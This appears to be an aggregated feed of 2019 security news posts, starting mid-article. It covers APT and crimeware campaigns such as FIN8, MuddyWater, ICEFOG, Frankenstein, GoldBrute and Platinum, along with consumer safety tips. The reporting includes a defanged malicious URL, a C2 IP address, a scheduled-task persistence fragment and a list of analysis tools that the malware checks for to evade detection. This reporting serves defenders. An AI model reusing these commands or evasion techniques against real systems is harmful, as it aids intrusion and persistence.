ShellTea is then injected into Explorer, it communicates with the C2 over HTTPs and supports various commands, such as loading and executing a delivered executable, creating/executing processes, executing any PowerShell command using downloaded native Empire ReflectivePicker, and of course downloading and executing a POS malware.

Attackers use the PowerShell script to collect information on the user and the network, then sends Gzipped data to the C2 and delete it.

Experts pointed out that attackers are constantly innovating their arsenal, their new techniques are able to easily evade standard POS defenses.

“The hospitality industry, and particularly their POS networks, continues to be one of the industries most targeted by cybercrime groups. In addition to this attack by FIN8,we’ve seen multiple attacks by FIN6FIN7 and others.” concludes Morphisec.

Many POS networks are running on the POS version of Window 7, making them more susceptible to vulnerabilities. What’s more, attackers know that many POS systems run with only rudimentary security as traditional antivirus is too heavy and requires constant updating that can interfere with system availability.” ” As we see here, attack syndicates are constantly innovating and learn from their mistakes – the numerous improvements and bug fixes from the previous version of ShellTea are evident. The techniques implemented can easily evade standard POS defenses. “

Pierluigi Paganini

(SecurityAffairs – FIN8, hacking)

The post FIN8 Hacking Group is back with an improved version of the ShellTea Backdoor appeared first on Security Affairs.

Bargain or Bogus Booking? Learn How to Securely Plan Summer Travel

With summertime just around the corner, families are eagerly looking to book their next getaway. Since vacation is so top-of-mind during the summer months, users are bound to come across websites offering cheap deals on flights, accommodations, and other experiences and activities. With so many websites claiming to offer these “can’t-miss deals,” how do you know who to trust?

It turns out that this is a common concern among folks looking for a little summer getaway. According to our recent survey of 8,000 people across the UK, US, Canada, Australia, France, Germany, Spain, and Singapore, 54% of respondents worry about their identity being stolen while booking and purchasing travel and accommodation online. However, 27% don’t check the authenticity of a website before booking their vacation online. Over half of these respondents say that it doesn’t cross their minds to do so.

These so-called “great deals” can be difficult to pass up. Unfortunately, 30% of respondents have been defrauded thanks to holiday travel deals that were just too good to be true. What’s more, 46.3% of these victims didn’t realize they had been ripped off until they arrived at their holiday rental to find that the booking wasn’t actually valid.

In addition to avoiding bogus bookings, users should also refrain from risky online behavior while enjoying their summer holidays. According to our survey, 44.5% of respondents are putting themselves at risk while traveling by not checking the security of their internet connection or willingly connecting to an unsecured network. 61% also stated that they never use a VPN, while 22% don’t know what a VPN is.

Unfortunately, travel-related attacks aren’t limited to just travelers either; hotels are popular targets for cybercriminals. According to analysis conducted by the McAfee Advanced Threat Research team, the most popular attack vectors are POS malware and account hijacking. Due to these attacks, eager vacationers have had their customer payment, credit card data, and personally identifiable information stolen. In order for users to enjoy a worry-free vacation this summer, it’s important that they are aware of the potential cyberthreats involved when booking their trips online and what they can do to prevent them.

Together with HomeAway, we here at McAfee are working to help inform users of the risks they face when booking through unsecured or unreliable websites as well as when they’re enjoying some summertime R&R. Check out the following tips so you can enjoy your vacation without questioning the status of your cybersecurity:

  • Always connect with caution. If you need to conduct transactions on a public Wi-Fi connection, use a virtual private network (VPN) to help keep your connection secure.
  • Think before you click. Often times, cybercriminals use phishing emails or fake sites to lure consumers into clicking links for products or services that could lead to malware. If you receive an email asking you to click on a link with a suspicious URL, it’s best to avoid interacting with the message altogether.
  • Browse with security protection. Use a comprehensive security solution, like McAfee Total Protection, which includes McAfee WebAdvisor that can help identify malicious websites.
  • Utilize an identity theft solution. With all this personal data floating around online, it’s important to stay aware of any attempts to steal your identity. Use an identity theft solution, such as McAfee Identity Theft Protection, that can help protect personally identifiable information from identity theft and fraud.

And, as always, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Bargain or Bogus Booking? Learn How to Securely Plan Summer Travel appeared first on McAfee Blogs.

Security Affairs 2019-06-11 00:49:57

The MuddyWater cyber espionage group has used an updated multi-stage PowerShell backdoor in recent cyber attacks.

Security experts at Trend Micro report that the MuddyWater APT group (aka SeedWorm and TEMP.Zagros), has used an updated multi-stage PowerShell backdoor in recent cyber espionage campaigns.

The first MuddyWater campaign was observed in late 2017 when targeted entities in the Middle East.

The experts called the campaign ‘MuddyWater’ due to the confusion in attributing a wave of attacks that took place between February and October 2017 targeting entities in Saudi Arabia, Iraq, Israel, United Arab Emirates, Georgia, India, Pakistan, Turkey, and the United States to date.

The group evolved over the years by adding new attack techniques to its arsenal.

In March 2018, experts at FireEye uncovered a massive phishing campaign conducted by the TEMP.Zagros group targeting Asia and Middle East regions from January 2018 to March 2018.

The threat actors continue to evolve their TTPs, a few weeks ago Cisco Talos attributed the recently spotted campaign tracked as “BlackWater” to the MuddyWater APT group and highlighted the usage of new anti-detection techniques.

Now, according to Trend Micro, the APT group has updated its multi-stage PowerStats backdoor, the experts already observed a new variant in spear-phishing attacks aimed at a university in Jordan and the Turkish government.

“One of the campaigns sent spear-phishing emails to a university in Jordan and the Turkish government. The said legitimate entities’ sender addresses were not spoofed to deceive email recipients. Instead, the campaign used compromised legitimate accounts to trick victims into installing malware.” reads the analysis published by Trend Micro.

“Our analysis revealed that the threat actor group deployed a new multi-stage PowerShell-based backdoor called POWERSTATS v3.”

MuddyWater hackers used some compromised legitimate accounts to send out spear-phishing message containing a document embedded with a malicious macro.

MuddyWater email

The macro was used to drop a VBE file that holds a block of data containing an obfuscated PowerShell script. 

The block of data will be decoded and saved to the %PUBLIC% directory with various names and image file extensions such as .jpeg and .png. The attackers’ PowerShell code implements a custom string obfuscation and junk stubs of code to make it difficult to analyze.

Once all the strings are deobfuscated, a final backdoor code is revealed. The malicious code backdoor first gathers operating system (OS) information and save the result to a log file that is sent back to the C&C server.

“Each victim machine will generate a random GUID number, which will be used for machine identification. Later on, the malware variant will start the endless loop, querying for the GUID-named file in a certain folder on the C&C server.” continues the analysis. “If such a file is found, it will be downloaded and executed using the Powershell.exeprocess.”

The hackers can launch a second state attack by sending specific commands to the backdoor. The malicious code is also able to install and execute other payloads, including another backdoor analyzed by Trend Micro that supports several commands such as taking screenshots, and executing commands via the cmd.exe binary.

The backdoor is also able to execute PowerShell code via the “Invoke-Expression” cmdlet.

The hackers connect to the C2 with PHP scripts that have a hardcoded token and a set of backend functions such as sc (screenshot), res (result of executed command), reg (register new victim), and uDel (self-delete after an error).

Trend Micro observed an evolution of the malicious code used by the MuddyWater group, in March and April, the hackers were using the heavily obfuscated POWERSTATS v2, but in May they deployed the new/ POWERSTATS v3 in May. 

The following table reports some of the campaigns observed by Trend Micro in H1 2019 with associated payloads and publicly available post-exploitation tools:


Discovery Date Method for dropping malicious codeType of files droppedFinal payload
2019-03MacrosBase64 encoded, BATPOWERSTATS v2
2019-04Template injectionDocument with macrosPOWERSTATS v1 or v2
2019-05MacrosVBEPOWERSTATS v3

It is interesting to note that the MuddyWater attackers are not using zero-days exploits in their campaigns, anyway the threat actors continue to evolve their TTPs to avoid the detection.

“While MuddyWater appears to have no access to zero-days and advanced malware variants, it still managed to compromise its targets. This can be attributed to the constant development of their schemes. Notably, the group’s use of email as an infection vector seems to yield success for their campaigns,” Trend Micro concludes. 

Pierluigi Paganini

(SecurityAffairs – MuddyWater, hacking)

The post appeared first on Security Affairs.

CVE-2019-2725 Oracle WebLogic flaw exploited in cryptojacking campaign

The CVE-2019-2725 vulnerability in Oracle WebLogic recently, addressed by the company, is being exploited in cryptojacking attacks, Trend Micro reports.

Experts at Trend Micro reported that the recently patched CVE-2019-2725 vulnerability in Oracle WebLogic is being exploited in cryptojacking attacks.

The flaw is a deserialization remote command execution zero-day vulnerability that affects the Oracle WebLogic wls9_async and wlswsat components.

The issue affects all Weblogic versions, including the latest one, that have the wls9_async_response.war and wls-wsat.war components enabled.

Oracle WebLogic Server is a Java EE application server currently developed by Oracle Corporation, it is used by numerous applications and web enterprise portals based on Java technology.

An attacker could exploit the vulnerability to remotely execute commands without authorization by sending a specially crafted HTTP request.

The CVE-2019-2725 flaw was patched in late April, unfortunately, a few days later threat actors started exploiting the Oracle WebLogic Server vulnerability to deliver the Sodinokibi ransomware.

After the publication of the security advisory, experts at the SANS Institute reported that the flaw was already being actively exploited in cryptojacking campaigns. Experts at Trend Micro now confirm the SANS report and add that attackers are using an interesting obfuscation technique.

The malware used in this campaign hides its malicious codes in certificate files to evade detection.

CVE-2019-2725 cryptojacking

Once the malware is executed it exploits the CVE-2019-2725 flaw to execute a command and perform a series of routines. 

“The purpose of the command is to perform a series of routines. First, PowerShell (PS) is used to download a certificate file from the command-and-control (C&C) server and save it under %APPDATA% using the file name cert.cer (detected by Trend Micro as Coinminer.Win32.MALXMR.TIAOODCJ.component).” reads the analysis published by Trend Micro.

“It then employs the component CertUtil, which is used to manage certificates in Windows, to decode the file.”

The attack chains starts with a PowerShell that downloads a certificate file from the C2 server. The malicious code uses the CertUtil tool to decode the file, then execute it using PowerShell. The downloaded file is then deleted using cmd.

The certificate file appears as a Privacy-Enhanced Mail (PEM) format certificate, it is in the form of a PowerShell command instead of the X.509 TLS file format.

“One interesting characteristic of the downloaded certificate file is that it requires that it be decoded twice before the PS command is revealed, which is unusual since the command from the exploit only uses CertUtil once.” continues the experts. “There is also the possibility that the certificate file we downloaded is different from the file that was actually intended to be downloaded by the remote command, perhaps because it is continuously being updated by the threat actors.”

The command in the certificate file is used by crooks to download and execute another PowerShell script in memory. The script downloads and executes multiple files, including Sysupdate.exe (Monero miner), Config.json (configuration file for the miner), Networkservice.exe (likely used for propagation and exploitation of WebLogic), Update.ps1 (the PowerShell script in memory), Sysguard .exe (watchdog for the miner process), and Clean.bat (deletes other components). 

Experts noticed that the update.ps1 file that contains the decoded certificate file is replaced with the new update.ps1 and a scheduled task is created to execute the new PowerShell script every 30 minutes.

The idea of hiding malware into certificate is not a novelty, experts at Sophos explored this technique in a proof of concept late last year.

“However, oddly enough, upon execution of the PS command from the decoded certificate file, other malicious files are downloaded without being hidden via the certificate file format mentioned earlier.” concludes Trend Micro. “This might indicate that the obfuscation method is currently being tested for its effectiveness, with its expansion to other malware variants pegged at a later date,”

Pierluigi Paganini

(SecurityAffairs – CVE-2019-2725, Oracle WebLogic)

The post CVE-2019-2725 Oracle WebLogic flaw exploited in cryptojacking campaign appeared first on Security Affairs.

Malware peddlers hit Office users with old but reliable exploit

Emails delivering RTF files equipped with an exploit that requires no user interaction (except for opening the booby-trapped file) are hitting European users’ inboxes, Microsoft researchers have warned. Exploit delivers backdoor The exploit takes advantage of a vulnerability in an older version of the Office Equation Editor, which was manually patched by Microsoft in November 2017. “The CVE-2017-11882 vulnerability was fixed in 2017, but to this day, we still observe the exploit in attacks. Notably, … More

The post Malware peddlers hit Office users with old but reliable exploit appeared first on Help Net Security.

Security Affairs newsletter Round 217 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

ESET analyzes Turla APTs usage of weaponized PowerShell
Leicester City Football Club disclosed a card breach
ProtonMail denies that it spies on users for government agencies
Expert shows how to Hack a Supra Smart Cloud TV
Gaining Root Access to Host through rkt Container hack
Google is taking action on deceptive installation tactics for Chrome Browser Extensions
Google outages in Eastern US affected Gmail, G-Suite, YouTube, and more
Threat actors abuse Microsoft Azure to Host Malware and C2 Servers
A month later Gamaredon is still active in Eastern Europe
Australian teenager hacked into Apple twice for a job
CVE-2019-9510 flaw allows hackers to bypass Windows lock screen on RDP sessions
macOS zero-day in Mojave could allow Synthetic Clicks attacks
OilRigs Jason email hacking tool leaked online
BlackSquid malware uses multiple exploits to drop cryptocurrency miners
Expert developed a MetaSploit module for the BlueKeep flaw
NSA urges Windows Users and admins to Patch BlueKeep flaw
Tens of Million patients impacted by the AMCA data breach
The Australian National University suffered a major, sophisticated attack
0patch experts released unofficial Patch Available for Recent Windows 10 Task Scheduler Zero-Day
Analyzing the APT34s Jason project
Cisco disclosed several flaws in Cisco Industrial Network Director
Platinum APT and leverages steganography to hide C2 communications
Remote code execution flaw in Ministra IPTV Platform exposes user data and more
Tor Project released Tor Browser 8.5.1 for Windows, Mac, Linux, and Android
VMware addressed flaws in its Workstation and Tools
Crooks stole about $10 million from GateHub cryptocurrency wallet service
Cryptocurrency startup Komodo hacks itself to protect its users funds from hackers
Fort Worth IT Professionals Fired for Reporting Cybersecurity Issues: What We Know
New GoldBrute Botnet is attempting to infect 1.5 Million RDP Servers
SandboxEscaper releases Byebear exploit to bypass patched EoP flaw
Frankenstein campaign: threat actors put together open-source tools for highly-targeted attacks
Hunting the ICEFOG APT group after years of silence
Recently a large chunk of European mobile traffic was rerouted through China Telecom

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 217 – News of the week appeared first on Security Affairs.

Hunting the ICEFOG APT group after years of silence

A security researcher found new evidence of activities conducted by the ICEFOG APT group, also tracked by the experts as Fucobha.

Chi-en (Ashley) Shen, a senior security researcher at FireEye, collected evidence that demonstrates that China-linked APT group ICEFOG (aka Fucobha) is still active.

The activities of the APT group were first uncovered by Kaspersky Lab in September 2013, at the time the researchers defined the crew as an emerging group of cyber-mercenaries that was able to carry out surgical hit and run operations against strategic targets.  The cyber mercenaries were recruited by governments and private companies, it was composed of highly skilled hackers able to conduct sophisticated attacks.

The APT group is considered a persistent collector of sensitive information, Kaspersky team detected a series of attacks against the defense supply chain (e.g. Military contractors, shipbuilders, satellite operators, high-tech companies ) in Japan and South Korea.

The Icefog team also targeted companies in the energy industry in the US, threat actors used a custom backdoor dubbed “Fucobha”, which included exploits for both Microsoft Windows and Mac OS X.

At the time the “hit and run” nature of the operations appeared unusual, the attackers were processing victims rapidly, stealing only information of interest and showing a deep knowledge of the targets and the information they were searching for.

The group of hackers went dark just after the Kaspersky shared findings of its investigation in September 2013.

This week, Chi-en (Ashley) Shen presented at the CONFidence cybersecurity conference held in Poland her analysis on new samples of malware associated with the ICEFOG group.

Two of them, tracked as ICEFOG-P and ICEFOG-M, have been used in targeted attacks in 2014 and 2018, respectively. Some samples for both variants have been compiled between 2014 and 2019.


Both ICEFOG-P and ICEFOG-M are more complex of the original backdoor, a circumstance that suggests the threat actors have continued to develop and use it.

ICEFOG-M is the latest variant, it is a fileless malware that supports the same features of the ICEFOG-P but leverages HTTPs for communications.

The researchers explained that the ICEFOG-P variant is not particularly complex, it remained under the radar simply because was rarely used.

The researcher also spotted a Mac version of the malware, tracked as MacFog) that was unknown in the cyber security community. MacFog was initially distributed in Chinese forums

Unlike the operations observed between 2011 and 2013, the new malware variants were involved in multiple campaigns conducted by different groups,

Shen spotted variants of the ICEFOG malware in attacks targeting:

  • an unnamed agriculture company in Europe in 2015
  • government, media, and finance organizations in Russia and Mongolia in 2015 (TOPNEWS campaign)
  • the government of multiple former Soviet states in 2015 (Roaming Tiger)
  • Kazach officials in 2016 (APPER campaign)
  • water source provider, banks, and government entities in Turkey, India, Kazakhstan, Uzbekistan, and Tajikistan in 2018 (WATERFIGHT campaign)
  • an unknown entity in the Philippines in 2018 (PHKIGHT campaign)
  • organizations in Turkey and Kazakhstan in 2018 and 2019 (SKYLINE campaign)

In the latest campaign in 2019, tracked as SKYLINE Campaign, hackers targeted Turkey and Kazakhstan, the timestamp suggests the campaign might have been active at least since 2018. Attackers leveraged CVE 2017-11882 shared exploit template and used a fileless version of the ICEFOG-M.

icefog attacks timeline

According to Shen, most samples were mainly involved in cyber espionage campaign, threat actors appear to be politically motivated.

Below the conclusions of the excellent analysis conducted by Shen:

  • ICEFOG is malware shared among Roaming Tiger, APT15, Temp Group A and suspected APT9.
  • Shared malware is a pitfall for attribution, we should not do attribution only based on malware.
  • Temp Group A is aggressively using ICEFOG-P and ICEFOG-M to target Russia, Kazakhstan, Tajikistan, Uzbekistan and Turkey.
  • With the file-less ICEFOG-M, host-based detection for payloads are more difficult.
  • Continued development indicates there could be more attacks leveraging ICEFOG in future campaigns, and possibly leveraged by more attackers

Pierluigi Paganini

(SecurityAffairs – cyberespionage, hacking)

The post Hunting the ICEFOG APT group after years of silence appeared first on Security Affairs.

Frankenstein campaign: threat actors put together open-source tools for highly-targeted attacks

Cisco Talos experts uncovered a new wave of attacks tracked as Frankenstein campaign, attackers used tools built by combining four open-source techniques.

Security experts at Cisco Talos uncovered a series of highly targeted attacks, tracked as Frankenstein campaign, hackers used tools built by combining four different open-source techniques.

Attackers behind the Frankenstein campaign carried out several malware-based attacks between January and April 2019. Talos researchers discovered a low volume of documents in various malware repositories.

“Cisco Talos recently identified a series of documents that we believe are part of a coordinated series of cyber attacks that we are calling the Frankenstein campaign.” reads the analysis published by Cisco Talos. “We assess that this activity was hyper-targeted given that there was a low volume of these documents in various malware repositories. Frankenstein — the name refers to the actors’ ability to piece together several unrelated components — leveraged four different open-source techniques to build the tools used during the campaign.”

Researchers at Talos team believe the attackers are moderately sophisticated but highly resourceful.

The attackers used multiple anti-detection techniques such as checking to see if any analysis tools, such as Process Explorer, were running in the background and determining whether the malicious code was running in a virtualized environment.

Other anti-detection techniques such as only responding to GET requests that contained predefined fields, and using encryption to protect data in transit.

Talos experts identified two weaponized Word documents used in the Frankenstein campaign that were likely sent to the victims via emails. The first document named “MinutesofMeeting-2May19.docx“, displays the national flag of Jordan, once opened it will fetch a remote template and trigger the CVE-2017-11882 exploit to execute code on the target machine.

“Once the victim opens the document, it fetches a remove template from the actor-controlled website, hxxp://droobox[.]online:80/luncher.doc. Once the luncher.doc was downloaded, it used CVE-2017-11882, to execute code on the victim’s machine. After the exploit, the file would run a command script to set up persistence as a scheduled task named “WinUpdate”.” continues the analysis. 

“/Create /F /SC DAILY /ST 09:00 /TN WinUpdate /TR” That scheduled task would run a series of base64-encoded PowerShell commands that acted as a stager.”

frankenstein campaign

The second sample prompts the victim to enable macros and run a Visual Basic script. 

One of the documents detected by the experts appears as a document created by the security firm Kaspersky, in other two cases attackers used documents specifically designed to target Middle Eastern entities.

Experts also described a

In the second scenario observed by Talos, threat actors used a weaponized document. When the macro is enabled, it executes a Visual Basic Application (VBA) script implementing two anti-analysis features. 

The script first queries Windows Management Instrumentation (WMI) to check if specific applications are running: VMWare, Vbox, Process Explorer, Process Hacker, ProcMon, Visual Basic, Fiddler, and WireShark. Then the script checks if specific tasks are running: VMWare, Vbox, VxStream, AutoIT, VMtools, TCPView, WireShark, Process Explorer, Visual Basic, and Fiddler. 

If the script finds one of the above apps or tasks it halts its execution, otherwise it calls WMI and determines the number of cores allocated to the system and exits if the number of cores is less than two. 

Once the evasion checks were complete, the attackers used MSbuild to execute an actor-created file named “LOCALAPPDATA\Intel\instal.xml”. According to Talos, threat actors chose MSBuild because it is a signed Microsoft binary, this feature allows to bypass application whitelisting controls on the host when being used to execute arbitrary code. 

Attackers used a PowerShell Empire agent to gather information on the local system, including Username, Domain name, Machine name, Public IP address, administrative privileges, currently running processes, operating system version, and the security system’s SHA256 HMAC. 

Then the data is sent back to the C&C server via an encrypted channel.

“A campaign that leverages custom tools is more easily attributed to the tools’ developers. One example of this was the code overlap in the VPNFilter malware that allowed us to associate the activity with the BlackEnergy malware.” Talos concludes. “By contrast, operations performed with open-source frameworks are extremely difficult to attribute without additional insights or intelligence.”

Pierluigi Paganini

(SecurityAffairs – Frankenstein campaign, hacking)

The post Frankenstein campaign: threat actors put together open-source tools for highly-targeted attacks appeared first on Security Affairs.

Cyber News Rundown: Medical Testing Service Data Breach

Reading Time: ~ 2 min.

Quest Diagnostics Customers Affected by Third-Party Breach

The medical testing organization Quest Diagnostics has fallen victim to a third-party data breach that could affect nearly 12 million of their patients. AMCA, a collections agency that works with Quest Diagnostics, noticed unauthorized access to their systems over an eight-month period from August of last year through March 2019. The majority of data targeted were Social Security Numbers and other financial documents, rather than patient’s health records. The market offers a premium for such data.

Adware Installed by Millions of Android Users

Until recently, there were over 230 apps on the Google Play store that had been compromised by a malicious plugin that forced out-of-app advertisements on unsuspecting victims. Globally, over 440 million individuals have installed at least one of these compromised applications and have been affected by overly-aggressive advertisements. While this SDK has been used legitimately for nearly a year, sometime during 2018 the plugin began performing increasingly malicious behaviors, until other developers caught on and began updating their own applications to remove the plugin. 

Chinese Database Exposes Millions of Records

A database belonging to FMC Consulting, a headhunting firm based in China, was recently found by researchers to be publicly available. Among the records are resumes and personally identifiable information for millions of individuals, as well as company data with thousands of recorded messages and emails. Unfortunately for anyone whose information is contained within this database, in the two weeks since being notified of the breach FMC has yet acknowledge the breach or take steps to secure it.

Restaurant Payment Systems Infected

Customer who’ve patronized either Checkers or Rally’s restaurants in recent months are being urged to monitor their credit cards after the chain announced that they discovered card stealing malware on their internal systems. While not all restaurant locations were affected, the company is still working to determine the extent of the compromised payment card systems and has offered credit monitoring services to customers.

University of Chicago Medicine Server Found Online

Researchers have found a server belonging to University of Chicago Medicine with personal information belonging to more than 1.6 million current and past donors. The data includes names, addresses, and even marital and financial information for each donor. Fortunately, the researcher was quick to inform the university of the unsecured ElasticSearch server and it was taken down within 48 hours.

The post Cyber News Rundown: Medical Testing Service Data Breach appeared first on Webroot Blog.

Threatlist: Targeted Espionage-as-a-Service Takes Hold on the Dark Web

One in four underground merchants offer advanced hacking services, once reserved for APTs and well-funded organized crime gangs.

The Endless Scourge of Malicious Email

There is no question that unwanted email is a source of annoyance. It is also the biggest source of cyber threats. In fact, just last month, spam accounted for 85 percent of all email sent. Plus, according to Verizon’s 2018 Data Breach Investigations Report, email is the number one vector for both malware distribution (92.4 percent) and phishing (96 percent). Attackers know that, unfortunately, this channel just works.

Because email forces the user to stop and at least scan every message they receive, it presents the perfect opportunity to serve up malicious links and file attachments that people in a hurry sometimes mistakenly click on. Phishing and social engineering have gotten so sophisticated that it can be hard for even cyber-savvy users to discern the legitimate from the malicious.

Our most recent CISO Benchmark Study showed that 56 percent of CISOs we surveyed felt that defending against the user behavior of clicking a malicious link in an email is very or extremely challenging. This ranks higher than any other security concern surveyed—higher than data in the public cloud, and even higher than mobile device use.

The risk becomes evident when looking at simulated phishing campaigns carried out as part of Duo Insight, a tool that allows users to craft fake phishing campaign in order to test and educate users within their organization. Duo’s 2018 research showed that 62 percent of phishing simulation campaigns captured at least one set of user credentials. Of all the recipients, almost a quarter clicked the phishing link in the email and half of them entered credentials into a fake website.

In a separate Cisco survey commissioned last year, 70 percent of those respondents reported that protecting against email threats is becoming more difficult. Regarding the consequences of email-borne attacks, 75 percent of respondents said they experienced significant operational impacts, and 47 percent reported significant financial impacts.

The picture is grim, and sadly, the numbers are trending up. Overall volume of spam email is currently at a 15-month high, according to Talos Intelligence data, and the number of new phishing domains has shown a 64 percent increase from January through March 2019, indicating that attackers could be gearing up for more phishing attacks.

While the following preventive steps have been recommended many times by many sources, given the continued increase in successful email attacks, they are worth repeating. At Cisco, we practice all of them regularly as part of our foundational and extensive security efforts – and it’s paid off through significant declines in email-based compromises of our network.

  • Run regular phishing exercises to teach employees how to recognize even highly tailored and sophisticated phishing attempts and report them
  • Use multi-factor authentication to prevent attackers from gaining access to accounts
  • Keep software up to date – email gateways, apps, operating systems, browsers, plug-ins; just make time to patch
  • Never wire money to a stranger – set up strict policies that require high-ranking authorization of wire-transfers; have a designated secondary signature requirement
  • Stop and think – does the message in the email sound technically plausible? Does the pitch make sense? Are there holes in the requester’s story?
  • Users – check the sender’s email address against the message signatory – do they match? If not, don’t touch it!

As has long been the case, a layered approach to security is critical in defending your organization from email-borne attacks. Traditional approaches like spam blockers, malware and URL blockers and integrated sand-boxing remain must-haves. There are also new technologies like DMARC, machine learning, email remediation and several others that will help all organizations keep up with the always changing email threat landscape.

We invite you to download our full report Email: Click with Caution – How to protect against phishing, fraud, and other scams…

Learn more about Cisco Email Security Advanced Phishing Protection here.

The post The Endless Scourge of Malicious Email appeared first on Cisco Blog.

New GoldBrute Botnet is attempting to infect 1.5 Million RDP Servers

A new botnet tracked as GoldBrute is scanning the web for Windows machines with Remote Desktop Protocol (RDP) connection enabled.

A new botnet tracked as GoldBrute has appeared in the threat landscape, it is scanning the web for Windows machines with Remote Desktop Protocol (RDP) connection enabled.

The botnet is currently targeting over 1.5 million unique endpoints online, it is used to brute-force RDP connections or to carry out credential stuffing attacks.

“This botnet is currently brute forcing a list of about 1.5 million RDP servers exposed to the Internet. Shdoan lists about 2.4 million exposed servers  [1]. GoldBrute uses its own list and is extending it as it continues to scan and grow.” wrote the researchers Renato Marinho of Morphus Labs who discovered the bot.

The GoldBrute botnet currently has a single command and control server (104[.]156[.]249[.]231), its bots exchange data with the C2 via AES encrypted WebSocket connections to port 8333. 

Querying the Shodan search engine for systems with RDP enabled it is possible to find roughly 2.4 million machines.

“An infected system will first be instructed to download the bot code. The download is very large (80 MBytes) and includes the complete Java Runtime. The bot itself is implemented in a Java class called GoldBrute” continues the expert.

“Initially, the bot will start scanning random IP addresses to find more hosts with exposed RDP servers. These IPs are reported back to the C&C server. After the bot reported 80 new victims, the C&C server will assign a set of targets to brute force to the bot.” 

GoldBrute botnet

Below the complete attack chain:

  • Botnet brute-forces RDP connection and gains access to a poorly protected Windows system.
  • It downloads a big zip archive containing the GoldBrute Java code and the Java runtime itself. It uncompresses and runs a jar file called “bitcoin.dll”.
  • The bot will start to scan the internet for “brutable” RDP servers and send their IPs to the C2 that in turn sends a list of IP addresses to brute force.
  • GoldBrute bot gets different “host + username + password”  combinations.
  • Bot performs brute-force attack and reports result back to C2 server.

According to the researcher, the list of “brutable” RDP targets is rapidly growing, this suggests that also the size of the botnet is increasing.

“Analyzing the GoldBrute code and understanding its parameters and thresholds, it was possible to manipulate the code to make it save all “host + username + password” combinations on our lab machine.” continues the expert.

“After 6 hours, we received 2.1 million IP addresses from the C2 server from which 1,596,571 are unique. Of course, we didn’t execute the brute-force phase. With the help of an ELK stack, it was easy to geolocate and plot all the addresses in a global world map, as shown below.”

goldbrute botnet map

The GoldBrute botnet is difficult to detect because every bot only launches one password-guessing attempt per victim.

The report published by Marinho also includes a list of IoCs.

Pierluigi Paganini

(SecurityAffairs – GoldBrute botnet, hacking)

The post New GoldBrute Botnet is attempting to infect 1.5 Million RDP Servers appeared first on Security Affairs.

Criminals are selling hacking services targeting world’s biggest companies

A new study – undertaken by Dr. Mike McGuire, Senior Lecturer in Criminology at the University of Surrey, and underwritten by Bromium – provides details of first-hand intelligence gathered from covert discussions with dark net vendors, alongside analysis by a panel of global industry experts across law enforcement and government. Network compromise tools and services on the dark net Key findings: 4 in 10 dark net vendors are selling targeted hacking services aimed at FTSE … More

The post Criminals are selling hacking services targeting world’s biggest companies appeared first on Help Net Security.

Platinum APT and leverages steganography to hide C2 communications

The Platinum cyber espionage group uses steganographic technique to hide communications with the Command and Control Servers  (C&C).

Experts from Kaspersky have linked the Platinum APT group with cyber attacks involving an elaborate, and new steganographic technique used to hide communications with C2 servers.

The APT group was discovered by Microsoft in 2016, it targeted organizations in South and Southeast. According to Microsoft, the Platinum has been active since at least 2009, it was responsible for spear phishing attacks on ISPs, government organizations, intelligence agencies, and defense institutes.

The hackers don’t appear to be financially motivated due to the nature of targeted entities and TTPs of the group.

In June 2018, experts at Kaspersky were investigating attacks against government and military entities in South and Southeast Asian countries,

The experts tracked the campaign as EasternRoppels, they speculate it may have started as far back as 2012.

“In June 2018, we came across an unusual set of samples spreading throughout South and Southeast Asian countries targeting diplomatic, government and military entities. The campaign, which may have started as far back as 2012, featured a multi-stage approach and was dubbed EasternRoppels.” reads the analysis published by the expert. “The actor behind this campaign, believed to be related to the notorious PLATINUM APT group, used an elaborate, previously unseen steganographic technique to conceal communication.”

The attack chain starts with WMI subscriptions to run an initial PowerShell downloader and fetch another small PowerShell backdoor for system fingerprinting and downloading additional code. 

The initial WMI PowerShell scripts observed in different attacks were using different hardcoded command and control (C&C) IP addresses, different encryption keys, salt for encryption and different active hours.

Threat actor located the C&C addresses on free hosting services, they used a large number of Dropbox accounts for storing the malicious code and store exfiltrated data.

Kaspersky spotted a backdoor while investigating another threat, further analysis allowed its experts to discover that it was a second stage malware used in one of the Platinum campaigns.

“We were able to find a backdoor that was implemented as a DLL and worked as a WinSock NSP (Nameservice Provider) to survive a reboot. The backdoor shares several features with the PowerShell backdoor described above: it has hardcoded active hours, it uses free domains as C&C addresses, etc.” continues Kaspersky.

The researchers discovered that in the two attacks, it was used the same domain to store exfiltrated data. The analysis of the encrypted files used in the second stage revealed a previously undiscovered backdoor associated with the Platinum group. 

Hackers used a dropper to install the steganography backdoor, the malicious code creates directories for the backdoor and saves backdoor-related files in these folders. Then the dropper runs the backdoor, implements a persistence mechanism, and then removes itself. 

Once the backdoor is installed on a target machine, it will connect to C&C server and downloads an HTML page that contains embedded commands that are encrypted with a key that is also embedded into the page.

“The page contains embedded commands that are encrypted with an encryption key, also embedded into the page. The embedded data is encoded with two steganography techniques and placed inside the <–1234567890> tag (see below). ” continues the analysis.


One of the steganography techniques used by the threat actors is based on the principle that HTML is indifferent to the order of tag attributes. The malicious code is able to decode line by line and collects an encryption key for the encoded data that are embedded in the page right after the HTML tags. Data are encoded with a second steganography technique.

The backdoor supports several commands, it could upload, download and execute files, handle requests for lists of processes and directories, upgrade and uninstall itself, and change the configuration file. 

The analysis also revealed another tool used as a configuration manager that allows creating configuration and command files for the backdoors. The utility is able to configure more than 150 options.

Experts also discovered a P2P backdoor that has many similarities with the previous one, it uses the same command names and the same names of options in the configuration files. 

“However, there are significant differences, too. The new backdoor actively uses many more of the options from the config, supports more commands, is capable of interacting with other infected victims and connecting them into a network (see the “Commands” section for details), and works with the C&C server in a different way. In addition, this backdoor actively uses logging: we found a log file dating back to 2012 on one victim PC.” continues the analysis.

The backdoor is able to sniff network traffic without keeping any socket in listening mode, it creates a listening socket every time someone attempts to connect.

According to the experts, the backdoor might have been active since at least 2012. 

“We have discovered a new attack by this group and noted that the actors are still working on improving their malicious utility and using new techniques for making the APT stealthier.” concludes Kaspersky. ” Finally, based on the custom cryptor used by the actors, we have been able to attribute this attack to the notorious PLATINUM group, which means this group is still active. “

Pierluigi Paganini

(SecurityAffairs – PLATINUM APT, hacking)

The post Platinum APT and leverages steganography to hide C2 communications appeared first on Security Affairs.

PCASTLE Malware Attacks Targeting China-Based Systems with XMRig

